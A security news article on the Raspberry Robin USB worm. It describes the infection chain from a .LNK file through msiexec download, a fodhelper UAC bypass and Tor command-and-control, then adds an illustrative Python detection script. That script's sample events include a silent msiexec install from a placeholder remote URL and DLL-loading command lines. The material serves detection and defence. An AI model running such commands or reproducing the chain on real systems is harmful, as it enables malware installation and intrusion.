Cybersecurity researchers have discovered a new Windows malware with worm-like capabilities that is propagated via removable USB devices.
Attributing the malware to a cluster named "Raspberry Robin," Red Canary researchers noted that the worm "leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL."
The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to the technology and manufacturing sectors.
Attack chains pertaining to Raspberry Robin begin with connecting an infected USB drive to a Windows machine. Present on the device is the worm payload, which appears as a .LNK shortcut file pointing to a legitimate folder.
The worm then spawns a new process using cmd.exe to read and execute a malicious file stored on the external drive.
This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for external network communication to a rogue domain for command-and-control (C2) purposes and to download and install a DLL library file.
The malicious DLL is subsequently loaded and executed using a chain of legitimate Windows utilities such as fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe, effectively bypassing User Account Control (UAC).
Also common across Raspberry Robin detections is the presence of outbound C2 contact involving the processes regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses associated with Tor nodes.
That said, the operators' objectives remain unknown at this stage. It is also unclear how and where the external drives are infected, although it is suspected that this is carried out offline.
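The chain described above (USB-launched cmd.exe, msiexec.exe fetching a package from a remote domain, fodhelper.exe parenting rundll32.exe or odbcconf.exe, and outbound connections from regsvr32.exe, rundll32.exe or dllhost.exe to Tor nodes) maps naturally onto process-creation and network-connection telemetry. The following is an added example written for this article, not Red Canary's detection content or anything from the malware itself: it runs a handful of stage-specific rules over constructed Sysmon-like event records. The event field names, the drive-letter and DLL-path heuristics, the `TOR_NODE_IPS` placeholder set, and every hostname, path and address in the sample events are assumptions chosen for illustration.

```python
"""Toy detection pass for the Raspberry Robin process chain.

Constructed example; not Red Canary's logic. Events are simplified dicts:
"proc" mimics Sysmon process creation (EID 1), "net" mimics Sysmon network
connection (EID 3). All indicator values below are placeholders.
"""
import re

# Placeholder for a Tor node list (RFC 5737 documentation addresses). A real
# detection would load a current list of Tor relays, not hardcode addresses.
TOR_NODE_IPS = {"203.0.113.10", "203.0.113.11"}

# Assumed heuristic: a drive letter other than C: stands in for a removable drive.
REMOVABLE_PATH = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)
# Any DLL path on the command line (used to spot the downloaded DLL being loaded).
DLL_PATH = re.compile(r'([a-z]:\\[^\s"]+?\.dll)', re.IGNORECASE)


def rule_usb_cmd(e):
    """Stage 1: explorer.exe (the .LNK) spawns cmd.exe that runs a file from a removable drive."""
    return (e["kind"] == "proc" and e["image"] == "cmd.exe"
            and e["parent"] == "explorer.exe"
            and REMOVABLE_PATH.search(e.get("cmdline", "")) is not None)


def rule_msiexec_remote(e):
    """Stage 2: Windows Installer told to install a package from a remote URL."""
    return (e["kind"] == "proc" and e["image"] == "msiexec.exe"
            and re.search(r"https?://", e.get("cmdline", ""), re.IGNORECASE) is not None)


def rule_fodhelper_child(e):
    """Stage 3: the auto-elevating fodhelper.exe parents rundll32.exe or odbcconf.exe (UAC bypass)."""
    return (e["kind"] == "proc" and e["parent"] == "fodhelper.exe"
            and e["image"] in {"rundll32.exe", "odbcconf.exe"})


def rule_dll_loader(e):
    """Stage 4: rundll32.exe/odbcconf.exe loading a DLL that lives outside C:\\Windows (assumed heuristic)."""
    if e["kind"] != "proc" or e["image"] not in {"rundll32.exe", "odbcconf.exe"}:
        return False
    return any(not p.lower().startswith("c:\\windows\\")
               for p in DLL_PATH.findall(e.get("cmdline", "")))


def rule_tor_c2(e):
    """Stage 5: regsvr32/rundll32/dllhost connecting to an address on the Tor node list."""
    return (e["kind"] == "net"
            and e["image"] in {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}
            and e.get("dest", "") in TOR_NODE_IPS)


RULES = [
    ("usb_cmd_launch", rule_usb_cmd),
    ("msiexec_remote_package", rule_msiexec_remote),
    ("fodhelper_child", rule_fodhelper_child),
    ("dll_loader", rule_dll_loader),
    ("tor_c2", rule_tor_c2),
]


def scan(events):
    """Return (rule_name, image) for every rule that fires, in event order."""
    return [(name, e["image"]) for e in events for name, rule in RULES if rule(e)]


def stages_hit(events):
    """Sorted list of distinct rule names that fired."""
    return sorted({name for name, _ in scan(events)})


def full_chain(events):
    """True when every stage of the described chain appears in the event stream."""
    return len(stages_hit(events)) == len(RULES)


# Constructed sample telemetry (not real logs); hostnames, paths and IPs are placeholders.
SAMPLE_EVENTS = [
    {"kind": "proc", "image": "explorer.exe", "parent": "userinit.exe", "cmdline": "explorer.exe"},
    {"kind": "proc", "image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": r"C:\Windows\System32\cmd.exe /c E:\readme.cmd"},
    {"kind": "proc", "image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": r"cmd.exe /c dir C:\temp"},                      # benign, not flagged
    {"kind": "proc", "image": "msiexec.exe", "parent": "cmd.exe",
     "cmdline": "msiexec.exe /q /i http://example.invalid/pkg.msi"},
    {"kind": "proc", "image": "fodhelper.exe", "parent": "rundll32.exe", "cmdline": "fodhelper.exe"},
    {"kind": "proc", "image": "rundll32.exe", "parent": "fodhelper.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe C:\Users\Public\helper.dll,Start"},
    {"kind": "proc", "image": "odbcconf.exe", "parent": "rundll32.exe",
     "cmdline": r"odbcconf.exe /a {regsvr C:\Users\Public\helper.dll}"},
    {"kind": "net", "image": "dllhost.exe", "dest": "203.0.113.10"},
    {"kind": "net", "image": "chrome.exe", "dest": "203.0.113.10"},  # not a chain process, not flagged
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
    print("full chain observed:", full_chain(SAMPLE_EVENTS))
```

Each rule is deliberately narrow to one stage; the value comes from correlating them on a single host, since any one of msiexec.exe with a URL, a non-C: drive path, or a rundll32.exe network connection will also appear in legitimate activity. In production the Tor set would be refreshed from a current relay list and the drive-letter heuristic replaced by the device-type information the endpoint agent actually records.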
"We also don't know why Raspberry Robin installs a malicious DLL," the researchers said. "One hypothesis is that it may be an attempt to establish persistence on an infected system."